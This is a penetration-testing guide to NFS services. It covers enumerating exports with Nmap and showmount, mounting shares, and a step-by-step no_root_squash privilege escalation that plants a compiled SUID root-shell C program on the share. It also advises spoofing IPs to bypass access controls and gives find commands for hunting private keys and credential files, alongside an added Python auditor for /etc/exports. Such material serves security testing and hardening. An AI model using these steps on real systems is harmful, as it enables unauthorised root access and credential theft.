NFS Service - Port 2049
Basic info
The Network File System (NFS) allows file sharing across Unix-like systems over a network. While convenient, NFS often exposes sensitive data and trust relationships due to misconfigurations or outdated security models. This guide delivers in-depth methods for discovering, analyzing, and exploiting NFS services during penetration testing engagements.
Identifying NFS Services During Network Reconnaissance
Port Scanning and Service Enumeration
NFS uses the following ports:
TCP/UDP 2049 - NFS Service
TCP/UDP 111 - Portmapper (rpcbind)
Run a detailed Nmap scan:
nmap -sV -sT -p 111,2049 --script=nfs-showmount,nfs-ls,nfs-statfs <target-ip>
Check for exposed mount points and exports.
Enumerating NFS Exports
Using showmount
Check accessible NFS shares:
showmount -e <target-ip>
Example output:
Export list for 10.0.0.1:
/home *
/var/nfs 192.168.0.0/24
* means accessible from any host
CIDR indicates trusted networks
Bypassing IP-based Access Controls
Use spoofed IP addresses or proxy from allowed subnets. In some cases, a misconfigured DNS resolution can allow access even if IP-based restrictions are in place.
Mounting NFS Shares and Privilege Analysis
Mounting an Export Locally
mkdir /mnt/nfs
mount -t nfs <target-ip>:/home /mnt/nfs
Check for files with improper permissions or user credentials.
UID/GID Mappings and Root Squashing
By default, NFS applies root squashing: remote root becomes nfsnobody. Check the /etc/exports configuration for the no_root_squash option:
/home *(rw,sync,no_root_squash)
If no_root_squash is set, root access is preserved, allowing privilege escalation.
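Added example (not part of the original guide): a server-side audit that parses /etc/exports text and reports the settings discussed above, namely no_root_squash and exports open to any host. The function name audit_exports, the finding labels and the sample file are assumptions made for illustration; "-option" default lists are only flagged for manual review and quoted paths are not handled.

```python
import re

# One client spec: "*(rw,sync)", "192.168.0.0/24(ro)", "host" or a bare "(rw)".
SPEC = re.compile(r"^(?P<host>[^()\s]*)(?:\((?P<opts>[^)]*)\))?$")
WORLD = {"", "*", "0.0.0.0/0", "::/0"}  # an empty host means "everyone"

# Constructed sample; the first two entries reuse the exports shown in this guide.
SAMPLE = """\
# path     client(options)
/home      *(rw,sync,no_root_squash)
/var/nfs   192.168.0.0/24(rw,sync)
/srv/build ci.example.internal (rw)
/srv/pub   *(ro,all_squash)
"""

def audit_exports(text):
    """Return (path, client, finding) tuples for risky export entries."""
    findings = []
    # Join backslash-continued lines, then drop comments and blank lines.
    for raw in text.replace("\\\n", " ").splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line:
            continue
        path, *specs = line.split()
        for spec in specs or [""]:  # a path with no client is exported to all
            m = SPEC.match(spec)
            if m is None or spec.startswith("-"):
                findings.append((path, spec, "review-manually"))
                continue
            host = m.group("host")
            opts = set(filter(None, (m.group("opts") or "").split(",")))
            client = host or "<any host>"
            if "no_root_squash" in opts:
                findings.append((path, client, "no_root_squash"))
            if host in WORLD:
                kind = "any-host-rw" if "rw" in opts else "any-host"
                findings.append((path, client, kind))
    return findings

if __name__ == "__main__":
    for path, client, finding in audit_exports(SAMPLE):
        print(f"{path:12} {client:12} {finding}")
```

The /srv/build entry is flagged because the space before (rw) makes it a separate client spec with no host, so the rw option applies to every host rather than to ci.example.internal.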
Exploiting no_root_squash for Remote Code Execution
Step-by-Step Attack
Create a SUID Binary on Mounted Share
echo -e '#include <stdio.h>\n#include <stdlib.h>\n#include <unistd.h>\nint main(){setuid(0); system("/bin/bash");}' > rootsh.c
gcc rootsh.c -o rootsh
chmod +s rootsh
mv rootsh /mnt/nfs/
Trigger Execution on Target
If the NFS share is mounted by a target system, wait for the binary to sync and then trigger execution through a scheduled task or user login.
Gain Shell with Root Privileges
Enumerating and Extracting Sensitive Files
Commands to Discover Valuable Files
find /mnt/nfs -type f -name "*.conf"
find /mnt/nfs -type f -name "*.pem"
find /mnt/nfs -type f -perm -4000
Look for:
SSH private keys
Database credentials
Password backup files
Misconfigured .bashrc, .profile, or crontabs